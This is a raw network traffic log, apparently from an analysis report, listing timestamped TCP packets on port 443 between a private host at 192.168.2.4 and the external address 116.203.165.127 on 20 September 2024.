Sep 20, 2024 11:07:47.252532959 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.900326014 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.900520086 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.901099920 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.901106119 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.903127909 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.903132915 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.333501101 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.333565950 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.333609104 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.333626032 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.333655119 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.333663940 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.333719015 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.364413977 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.364444017 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.364516020 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.364526987 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.364568949 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.433095932 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.433130026 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.433321953 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.433337927 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.433374882 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.463506937 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.463534117 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.463603973 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.463615894 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.463761091 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.500906944 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.500965118 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.501004934 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.501254082 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.501528978 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.501543045 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.502494097 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.502522945 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:48.502603054 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.502809048 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:48.502818108 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.153048992 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.153156996 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.153534889 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.153542042 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.155529976 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.155535936 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.585685968 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.585748911 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.585757017 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.585792065 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.585817099 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.585834026 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.585838079 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.585860968 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.585885048 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.585905075 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.617369890 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.617435932 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.617480993 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.617501974 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.617527008 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.617544889 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.685859919 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.685950041 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.685969114 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.685986042 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.686019897 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.686038017 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.716407061 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.716485023 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.716500998 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.716516972 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.716567993 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.755091906 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.755167007 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.755192995 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.755213022 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.755239010 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.755276918 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.786264896 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.786294937 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.786338091 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.786349058 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.786391973 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.805691957 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.805725098 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.805818081 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.805835009 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.805989981 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.823874950 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.823936939 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.823997021 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.824013948 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.824039936 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.824057102 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.841994047 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.842051983 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.842248917 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.842267990 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.842283010 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.842341900 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.856652975 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.856690884 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.856914043 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.856933117 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.856996059 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.874372959 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.874430895 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.874516964 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.874536991 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.874737978 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.890403986 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.890476942 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.890523911 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.890537024 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.890588999 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.903722048 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.903778076 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.903836012 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.903850079 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.903991938 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.903991938 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.915318966 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.915375948 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.915436983 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.915451050 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.915621996 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.924329042 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.924390078 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.924448013 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.924463034 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.924612999 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.924612999 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.934274912 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.934323072 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.934391022 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.934406996 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.934575081 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.943502903 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.943551064 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.943614960 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.943629980 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.943675995 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.943725109 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.950619936 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.950666904 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.950735092 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.950750113 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.950824022 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.961457968 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.961509943 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.961658955 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.961680889 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.961690903 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.961745977 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.972256899 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.972332001 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.972410917 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.972424030 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.972507954 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.985538960 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.985565901 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.985825062 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.985838890 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.985896111 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.998578072 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.998637915 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.998706102 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.998720884 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:49.998753071 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:49.998802900 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.009951115 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.010004044 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.010149956 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.010164022 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.010282040 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.017810106 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.017852068 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.017952919 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.017968893 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.018045902 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.027370930 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.027436018 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.027513981 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.027528048 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.027631044 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.034544945 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.034598112 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.034696102 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.034709930 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.034864902 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.044087887 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.044132948 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.044188976 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.044203043 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.044214964 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.044239044 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.053939104 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.053982019 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.054035902 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.054052114 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.054203033 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.054203033 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.072562933 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.072626114 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.072887897 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.072905064 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.073016882 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.085352898 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.085421085 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.085477114 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.085490942 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.085676908 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.097048998 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.097120047 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.097214937 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.097229958 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.097378969 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.097378969 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.105283976 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.105336905 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.105400085 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.105408907 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.105495930 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.114116907 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.114173889 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.114253998 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.114265919 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.114311934 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.114362955 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.121325970 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.121371984 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.121547937 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.121560097 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.121615887 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.130923033 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.130968094 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.131014109 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.131022930 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.131175995 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.140909910 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.140973091 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.141000032 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.141007900 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.141100883 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.159408092 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.159461975 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.159507990 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.159516096 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.159564018 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.178081036 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.178143978 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.178165913 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.178175926 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.178219080 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.183644056 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.183664083 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.183729887 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.183737993 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.183778048 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.191881895 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.191901922 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.191937923 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.191942930 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.191960096 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.191978931 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.200936079 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.200954914 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.201011896 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.201020956 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.201064110 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.208287001 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.208313942 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.208357096 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.208364010 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.208465099 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.227257013 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.227288008 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.227350950 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.227360010 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.227399111 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.227407932 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.240736008 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.240783930 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.240883112 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.240883112 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.240894079 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.240935087 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.246018887 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.246068001 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.246104002 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.246112108 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.246139050 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.246155024 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.264916897 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.264962912 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.265064955 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.265075922 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.265117884 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.271141052 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.271183968 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.271229982 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.271239042 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.271266937 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.271365881 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.278959036 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.279004097 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.279041052 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.279048920 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.279076099 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.279095888 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.288503885 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.288552999 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.288609028 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.288619995 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.288644075 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.288706064 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.295989990 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.296035051 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.296072960 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.296086073 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.296098948 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.296120882 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.314546108 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.314601898 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.314641953 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.314656973 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.314677954 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.314698935 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.328649998 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.328680992 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.328735113 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.328743935 CEST	443	49754	116.203.165.127	192.168.2.4
